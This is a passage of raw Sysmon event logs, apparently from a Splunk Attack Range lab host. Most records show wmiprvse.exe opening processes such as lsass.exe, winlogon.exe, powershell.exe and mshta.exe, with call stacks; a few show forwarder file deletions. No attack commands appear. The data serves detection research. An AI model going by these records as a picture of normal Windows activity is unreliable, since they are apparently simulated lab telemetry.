.dll+111bc 10341000x80000000000000002204102Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204101Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204100Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204099Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204098Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204097Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.868{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A81DC3BB95B1FA62C7BB8CC157A848E0,SHA256=E89C13452D9D8BEDAA240812AA9BD199A1BFC4B475A177B1726C33B3A1217A33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204096Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.853{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62671874E35269FB2FB93193714A27D4,SHA256=C4A80FA6DE78FFB2D88BFBE96A57B95CF97153D4F07CE22B81893443BFB04D91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204095Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.853{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204094Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.853{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204093Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.853{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204092Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204091Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204090Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204089Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204088Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204087Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204086Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204085Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204084Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204083Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204082Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204081Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 